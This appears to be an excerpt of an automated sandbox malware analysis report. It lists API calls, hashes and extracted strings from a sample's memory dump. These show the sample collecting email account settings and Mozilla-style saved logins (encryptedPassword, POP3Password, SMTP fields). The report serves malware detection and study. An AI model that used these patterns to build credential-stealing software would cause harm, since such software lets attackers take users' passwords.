                                                      • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                      • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                      APIs
                                                        • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                      • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID:
                                                      • API String ID: 145871493-0
                                                      • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                      • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                      • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                      • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                      APIs
                                                      • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                        • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                        • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                        • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile$StringWrite_itoamemset
                                                      • String ID:
                                                      • API String ID: 4165544737-0
                                                      • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                      • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                      • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                      • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                      APIs
                                                      • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                      • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                      • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                      • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                      APIs
                                                      • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                      • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                      • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                      • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                      APIs
                                                      • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                      • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                      • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                      • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                      APIs
                                                      • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: EnumNamesResource
                                                      • String ID:
                                                      • API String ID: 3334572018-0
                                                      • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                      • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                      • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                      • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                      APIs
                                                      • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CloseFind
                                                      • String ID:
                                                      • API String ID: 1863332320-0
                                                      • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                      • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                      • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                      • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Open
                                                      • String ID:
                                                      • API String ID: 71445658-0
                                                      • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                      • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                      • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                      • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                      APIs
                                                      • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                      • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                      • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                      • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileString_mbscmpstrlen
                                                      • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                      • API String ID: 3963849919-1658304561
                                                      • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                      • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                      • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                      • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??2@??3@memcpymemset
                                                      • String ID: (yE$(yE$(yE
                                                      • API String ID: 1865533344-362086290
                                                      • Opcode ID: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                      • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                      • Opcode Fuzzy Hash: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                      • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                      APIs
                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                        • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                        • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                        • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                      • memset.MSVCRT ref: 0040E5B8
                                                      • memset.MSVCRT ref: 0040E5CD
                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                      • memset.MSVCRT ref: 0040E6B5
                                                      • memset.MSVCRT ref: 0040E6CC
                                                        • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                        • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                      • memset.MSVCRT ref: 0040E736
                                                      • memset.MSVCRT ref: 0040E74F
                                                      • sprintf.MSVCRT ref: 0040E76D
                                                      • sprintf.MSVCRT ref: 0040E788
                                                      • _strcmpi.MSVCRT ref: 0040E79E
                                                      • _strcmpi.MSVCRT ref: 0040E7B7
                                                      • _strcmpi.MSVCRT ref: 0040E7D3
                                                      • memset.MSVCRT ref: 0040E858
                                                      • sprintf.MSVCRT ref: 0040E873
                                                      • _strcmpi.MSVCRT ref: 0040E889
                                                      • _strcmpi.MSVCRT ref: 0040E8A5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                      • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                      • API String ID: 4171719235-3943159138
                                                      • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                      • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                      • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                      • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                      • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                      • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                      • GetWindowRect.USER32(?,?), ref: 00410487
                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                      • GetDC.USER32 ref: 004104E2
                                                      • strlen.MSVCRT ref: 00410522
                                                      • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                      • ReleaseDC.USER32(?,?), ref: 00410580
                                                      • sprintf.MSVCRT ref: 00410640
                                                      • SetWindowTextA.USER32(?,?), ref: 00410654
                                                      • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                      • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                      • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                      • GetClientRect.USER32(?,?), ref: 004106DD
                                                      • GetWindowRect.USER32(?,?), ref: 004106E7
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                      • GetClientRect.USER32(?,?), ref: 00410737
                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                      • String ID: %s:$EDIT$STATIC
                                                      • API String ID: 1703216249-3046471546
                                                      • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                      • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                      • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                      • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                      APIs
                                                      • memset.MSVCRT ref: 004024F5
                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                      • _mbscpy.MSVCRT(?,00000000,?,?,?,7568EB20,?,00000000), ref: 00402533
                                                      • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _mbscpy$QueryValuememset
                                                      • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                      • API String ID: 168965057-606283353
                                                      • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                      • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                      • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                      • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                      • LoadCursorA.USER32(00000067), ref: 0040115F
                                                      • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                      • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                      • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                      • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                      • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                      • EndDialog.USER32(?,00000001), ref: 0040121A
                                                      • DeleteObject.GDI32(?), ref: 00401226
                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                      • ShowWindow.USER32(00000000), ref: 00401253
                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                      • ShowWindow.USER32(00000000), ref: 00401262
                                                      • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                      • memset.MSVCRT ref: 0040128E
                                                      • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                      • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                      • String ID:
                                                      • API String ID: 2998058495-0
                                                      • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                      • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                      • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                      • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                      APIs
                                                      • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                      • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                      • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                      • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                      • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                      • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcmp$memcpy
                                                      • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                      • API String ID: 231171946-2189169393
                                                      • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                      • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                      • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                      • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _mbscat$memsetsprintf$_mbscpy
                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                      • API String ID: 633282248-1996832678
                                                      • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                      • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                      • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                      • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: sprintf$memset$_mbscpy
                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                      • API String ID: 3402215030-3842416460
                                                      • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
